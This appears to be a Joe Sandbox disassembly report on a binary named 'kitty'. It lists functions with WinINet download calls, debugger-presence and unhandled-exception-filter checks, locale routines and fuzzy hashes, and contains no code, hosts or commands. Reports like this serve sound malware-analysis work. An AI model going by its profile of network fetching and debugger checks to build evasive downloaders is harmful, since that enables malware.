Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$Kp $OCP
API String ID: 2299586839-1860459098
Opcode ID: eca3ae74c1bbb98d9aaf9efe0ded721cdd9004a5f4e8dc5574a21325024498fa
Instruction ID: 7a384d28823e362d234beac296fef1dc892cb3edd8dba15e7a3ee19cb93c3070
Opcode Fuzzy Hash: eca3ae74c1bbb98d9aaf9efe0ded721cdd9004a5f4e8dc5574a21325024498fa
Instruction Fuzzy Hash: 5C219236720306AAEB349F58C80CA9773A6AF54B64B568434E90AC7186E732DE71C350

Function 001D5880 Relevance: 9.7, APIs: 6, Instructions: 653networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001D5A93
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,84000100,00000000), ref: 001D5CB4
InternetCloseHandle.WININET(00000000), ref: 001D5CC8
InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 001D5EBF
InternetCloseHandle.WININET(?), ref: 001D607F
InternetCloseHandle.WININET(?), ref: 001D6084

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Internet$CloseHandle$Open$FileRead
String ID:
API String ID: 4294395943-0
Opcode ID: 35b376552160fbdbec063128137f05a178a62c033ff691087e62bbbebe112128
Instruction ID: 798278b217e2185efcc3827ee930dadc11239e752d15bbde939d267564488327
Opcode Fuzzy Hash: 35b376552160fbdbec063128137f05a178a62c033ff691087e62bbbebe112128
Instruction Fuzzy Hash: BF42E376D217499BEB06DB74D8417EDF7B4AF66345F14C31AE800776A2EB30A6C28B40

Function 001F0594 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 001F05A0
IsDebuggerPresent.KERNEL32 ref: 001F066C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001F068C
UnhandledExceptionFilter.KERNEL32(?), ref: 001F0696

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: d5207dae8defe0f0abc9ded8912f09a6d365cf3491ce959ea1aaa326b9c76254
Instruction ID: 7ba10feee0086e1358784c1de0b5fe02a57ae843ebc94ac7b82ca88817ab2052
Opcode Fuzzy Hash: d5207dae8defe0f0abc9ded8912f09a6d365cf3491ce959ea1aaa326b9c76254
Instruction Fuzzy Hash: BD311875D0131CDBDB11EFA4D9897DDBBB8AF18300F1041AAE54DAB251EB719A848F44

Function 002069B4 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 001FBBF0: GetLastError.KERNEL32(001D1920,00000001,001D1924,001F5E6D,00000001,00000000,00000000,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBBF5
Part of subcall function 001FBBF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBC93

Part of subcall function 001FBBF0: _free.LIBCMT ref: 001FBC52
Part of subcall function 001FBBF0: _free.LIBCMT ref: 001FBC88

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00206A08
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00206A52
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00206B18

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: e82ca1049de8bf805914a2fdc6aca30a3a4bf7eeb92827d2477365f1bd2c2b32
Instruction ID: 847aa29c06de2be687ca70f30cb86c5ce97ea209183134eda3bf2f452437c2a6
Opcode Fuzzy Hash: e82ca1049de8bf805914a2fdc6aca30a3a4bf7eeb92827d2477365f1bd2c2b32
Instruction Fuzzy Hash: 306191716203079FDB249F28CD8ABBAB3A8EF04304F1081B9E905E65C6EB75D971CB50

Function 001F3DF3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001F3EEB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001F3EF5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001F3F02

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 46e7b29c5919bd678c6b35a150656e7607613ce0ca80b1bbb91be10cd3ecd73f
Instruction ID: 68dabe82f627b4b4e68b74214df53c16c5272c3c91773bde419a9df5e39bc3c6
Opcode Fuzzy Hash: 46e7b29c5919bd678c6b35a150656e7607613ce0ca80b1bbb91be10cd3ecd73f
Instruction Fuzzy Hash: 4631B37490121CABCB21DF64E8897DDBBB4BF18310F5042DAE51CA6251EB709B858F45

Function 0020688E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001FBBF0: GetLastError.KERNEL32(001D1920,00000001,001D1924,001F5E6D,00000001,00000000,00000000,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBBF5
Part of subcall function 001FBBF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBC93

EnumSystemLocalesW.KERNEL32(002069B4,00000001,00000000,?,-00000050,?,00206FE2,00000000,?,?,?,00000055,?), ref: 00206900

Strings

o , xrefs: 002068D5

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID: o
API String ID: 2417226690-1027261244
Opcode ID: 44d7b86c039caa9221a35209a231c09ce30cfa8cd48d6015dc9379f1d1e5c110
Instruction ID: 1234e51c8c104432f1389ae11b1b973a705d573f52eaef327b818e0c95ee2b6f
Opcode Fuzzy Hash: 44d7b86c039caa9221a35209a231c09ce30cfa8cd48d6015dc9379f1d1e5c110
Instruction Fuzzy Hash: 8E11293A2103065FDB189F39C89557AB792FF80358B14842DE98687A81D7716862CB40

Function 001EFC33 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001EFC49

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 655b72ad72a981ec6c9c24438323cdf7f5337f36e33498b0ae53f157fe992baa
Instruction ID: a495f793d7d077c55eabd42600d774bb105a434131a1617fbc727541ff932040
Opcode Fuzzy Hash: 655b72ad72a981ec6c9c24438323cdf7f5337f36e33498b0ae53f157fe992baa
Instruction Fuzzy Hash: F2515CB29006598FDB24CF95ED857AEBBF0FB58310F24843AD815EB290D7749942CB50

Function 00206C07 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 001FBBF0: GetLastError.KERNEL32(001D1920,00000001,001D1924,001F5E6D,00000001,00000000,00000000,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBBF5
Part of subcall function 001FBBF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBC93

Part of subcall function 001FBBF0: _free.LIBCMT ref: 001FBC52
Part of subcall function 001FBBF0: _free.LIBCMT ref: 001FBC88

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00206C5B

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 0860660ef6e2b850dfbc6096ce8b552c1a58df91c3d1bd11e512ba1ff045edd6
Instruction ID: acbeb55697256dd8aa474efca05fcf8bad2777ea74352f21a1fc06f6772008b9
Opcode Fuzzy Hash: 0860660ef6e2b850dfbc6096ce8b552c1a58df91c3d1bd11e512ba1ff045edd6
Instruction Fuzzy Hash: D021B332520307ABEB289F25DC8AA7A73ACEF04310B14006AFD01D7192EB75DD248B50

Function 00206E33 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 001FBBF0: GetLastError.KERNEL32(001D1920,00000001,001D1924,001F5E6D,00000001,00000000,00000000,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBBF5
Part of subcall function 001FBBF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBC93

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00206BD0,00000000,00000000,?), ref: 00206E5F

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 134ccb236990fab636ca50de68b3791c9a0fb2b591ef80eaa44c3721a8ba8787
Instruction ID: 9848716a7f476556eefea3d66b2b445641c0583c928b1b291b86d11914b2330e
Opcode Fuzzy Hash: 134ccb236990fab636ca50de68b3791c9a0fb2b591ef80eaa44c3721a8ba8787
Instruction Fuzzy Hash: F6F0D636920316ABDB245E64C80DBBB7768EF40354F054429AD06A31C1EA74FD61C5A0

Function 00206929 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001FBBF0: GetLastError.KERNEL32(001D1920,00000001,001D1924,001F5E6D,00000001,00000000,00000000,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBBF5
Part of subcall function 001FBBF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBC93

EnumSystemLocalesW.KERNEL32(00206C07,00000001,?,?,-00000050,?,00206FA6,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00206973

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 8f70372fd9c75da0e78b542fc2b9b5ad04691267271c331c24aa526a52d8d61b
Instruction ID: 30336a84e13f7c3a43e1e8573028709245c638b874fede278e5bb36c7845ee89
Opcode Fuzzy Hash: 8f70372fd9c75da0e78b542fc2b9b5ad04691267271c331c24aa526a52d8d61b
Instruction Fuzzy Hash: BEF046362103091FDB145F79D889A7ABB91EF80328B04802DF9458BEC2C7B1AC22CA90

Function 001FC03B Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 001F716D: EnterCriticalSection.KERNEL32(?,?,001F891C,00000000,0021C450,0000000C,001F88E3,?,?,001FC004,?,?,001FBD92,00000001,00000364,00000006), ref: 001F717C

EnumSystemLocalesW.KERNEL32(Function_0002C02E,00000001,0021C590,0000000C,001FC499,?), ref: 001FC073

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: fd5d8d85c7289da3979596807bd5bd339642ebc43cdcbef33b14ba1ecfe1031f
Instruction ID: 054151f6e043338be92661a811a025b9bdab1ce2f05b8ae18d8184eca6478a08
Opcode Fuzzy Hash: fd5d8d85c7289da3979596807bd5bd339642ebc43cdcbef33b14ba1ecfe1031f
Instruction Fuzzy Hash: 43F0C27AA40208DFD700EFA8E846BADB7F1EB19721F10822AF510D72E1CBB55941CF80

Function 00206843 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001FBBF0: GetLastError.KERNEL32(001D1920,00000001,001D1924,001F5E6D,00000001,00000000,00000000,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBBF5
Part of subcall function 001FBBF0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBC93

EnumSystemLocalesW.KERNEL32(0020679C,00000001,?,?,?,00207004,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0020687A

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2ab411052bf45db8acf7bf194381e386d4e2c97cec187253bc170520bbe046ae
Instruction ID: d7ddc01a5d01cd8f7645b9004d93ef91bd845f5b668f132d2fbdd1251a1b8414
Opcode Fuzzy Hash: 2ab411052bf45db8acf7bf194381e386d4e2c97cec187253bc170520bbe046ae
Instruction Fuzzy Hash: 04F0EC3930034557CB089F79D859766BF95EFC1714B06805DEE058B592C7719853C790

Function 001FC59D Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,001FA5DB,?,20001004,00000000,00000002,?,?,001F9BE8), ref: 001FC5D1

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 3779f0e15021a2caeee13495666c34823185fc97a2e0bd350472d0e69c2b53a6
Instruction ID: bd0bf28c8ba89ea05e6ebfac6ec69073eae6af4873c806377dce794ec2255de9
Opcode Fuzzy Hash: 3779f0e15021a2caeee13495666c34823185fc97a2e0bd350472d0e69c2b53a6
Instruction Fuzzy Hash: F1E04F3250121CBBCF122F60EE09ABE7E16EF44790F044010FE0565122CB329A21BAD4

Function 001F06F7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020703,001EFEBC), ref: 001F06FC

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7558ffb84064fc060d10b5bda01a24b1fe518694be597f2e1459bf9d8a7081f8
Instruction ID: 54cb6a5ec8050f6cff74f7215ceec9f316acd21cddf76d3ff8cce5f74f6e21fc
Opcode Fuzzy Hash: 7558ffb84064fc060d10b5bda01a24b1fe518694be597f2e1459bf9d8a7081f8
Instruction Fuzzy Hash:

Function 00207164 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00207164

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b41bbd96840d10270d06ae8e1abe485fa042d74456b77e771c6e269b6ae4c01a
Instruction ID: 339e76ebb007b7a510f68c63aaa26625b63183867492966aaaa79683d3d09641
Opcode Fuzzy Hash: b41bbd96840d10270d06ae8e1abe485fa042d74456b77e771c6e269b6ae4c01a
Instruction Fuzzy Hash: A0A01230502301CBA3104F717A0D20A3795650028070040555808C0121D63040018600

Function 001FF099 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c0ef43da93c54340bba4c6a1bc5f7e363d49e35ddafeeb886cefa17688984a
Instruction ID: df68731b4016a02b5792a4690f2ece38ed4880c33d95a875dd25f1f005f2f3aa
Opcode Fuzzy Hash: e9c0ef43da93c54340bba4c6a1bc5f7e363d49e35ddafeeb886cefa17688984a
Instruction Fuzzy Hash: 34F0E532611328EBCB26C78CD405B6DB3ACEB45B51F11406AF600E7252C7B0DE00C7D0

Function 001FF0DD Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8784d531f00f65a1755ea2ee7bc53ba0411dda85326038387147794ac4c9694a
Instruction ID: 148169cac97c9e629e8bb5d7e5e5e792aeaf4e505ae59112e0084f3d404178a3
Opcode Fuzzy Hash: 8784d531f00f65a1755ea2ee7bc53ba0411dda85326038387147794ac4c9694a
Instruction Fuzzy Hash: 83E08C32A1522CEBCB14DB9CC90499AF3FCEB44B40B1140AAB605D3210C3B0DE00D7D0

Function 001D29C0 Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 311networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001D2BA1
InternetOpenUrlA.WININET(00000000,00000007,00000000,00000000,84000000,00000000), ref: 001D2C1D
InternetCloseHandle.WININET(00000000), ref: 001D2C2A
InternetCloseHandle.WININET(00000000), ref: 001D2C98
InternetCloseHandle.WININET(00000000), ref: 001D2C9B
InternetReadFile.WININET(00000000,?,00002000,?), ref: 001D2CC7
InternetReadFile.WININET(00000000,?,00002000,?), ref: 001D2CFE
InternetCloseHandle.WININET(00000000), ref: 001D2D52
InternetCloseHandle.WININET(00000000), ref: 001D2D55

Strings

""~|fP, xrefs: 001D2A04
ios_base::eofbit set, xrefs: 001D2D84
sHM, xrefs: 001D2B30
33333333, xrefs: 001D2A93, 001D2AFF
ios_base::failbit set, xrefs: 001D2D7F
ios_base::badbit set, xrefs: 001D2D76, 001D2D9E

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Internet$CloseHandle$FileOpenRead
String ID: ""~|fP$33333333$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$sHM
API String ID: 3539267403-4122022229
Opcode ID: a5a5917db0f539bb3bf3d321916fac6c9dd03358e5c6ae08e79c234d5410d4c8
Instruction ID: c737be3d2b6c60c6e03c8d8a99b05e5295f3587226eb109023c4b723912281c2
Opcode Fuzzy Hash: a5a5917db0f539bb3bf3d321916fac6c9dd03358e5c6ae08e79c234d5410d4c8
Instruction Fuzzy Hash: E5B1E971D103489BDB06DBB8DC457E9F7B8AF69344F14835BF914B6252EB70AAC18B40

Function 00205B88 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00205BCC

Part of subcall function 00204E34: _free.LIBCMT ref: 00204E51
Part of subcall function 00204E34: _free.LIBCMT ref: 00204E63
Part of subcall function 00204E34: _free.LIBCMT ref: 00204E75
Part of subcall function 00204E34: _free.LIBCMT ref: 00204E87
Part of subcall function 00204E34: _free.LIBCMT ref: 00204E99
Part of subcall function 00204E34: _free.LIBCMT ref: 00204EAB
Part of subcall function 00204E34: _free.LIBCMT ref: 00204EBD
Part of subcall function 00204E34: _free.LIBCMT ref: 00204ECF
Part of subcall function 00204E34: _free.LIBCMT ref: 00204EE1
Part of subcall function 00204E34: _free.LIBCMT ref: 00204EF3
Part of subcall function 00204E34: _free.LIBCMT ref: 00204F05
Part of subcall function 00204E34: _free.LIBCMT ref: 00204F17
Part of subcall function 00204E34: _free.LIBCMT ref: 00204F29

_free.LIBCMT ref: 00205BC1

Part of subcall function 001FBF97: HeapFree.KERNEL32(00000000,00000000,?,00205589,?,00000000,?,?,?,0020582C,?,00000007,?,?,00205D1F,?), ref: 001FBFAD
Part of subcall function 001FBF97: GetLastError.KERNEL32(?,?,00205589,?,00000000,?,?,?,0020582C,?,00000007,?,?,00205D1F,?,?), ref: 001FBFBF

_free.LIBCMT ref: 00205BE3
_free.LIBCMT ref: 00205BF8
_free.LIBCMT ref: 00205C03
_free.LIBCMT ref: 00205C25
_free.LIBCMT ref: 00205C38
_free.LIBCMT ref: 00205C46
_free.LIBCMT ref: 00205C51
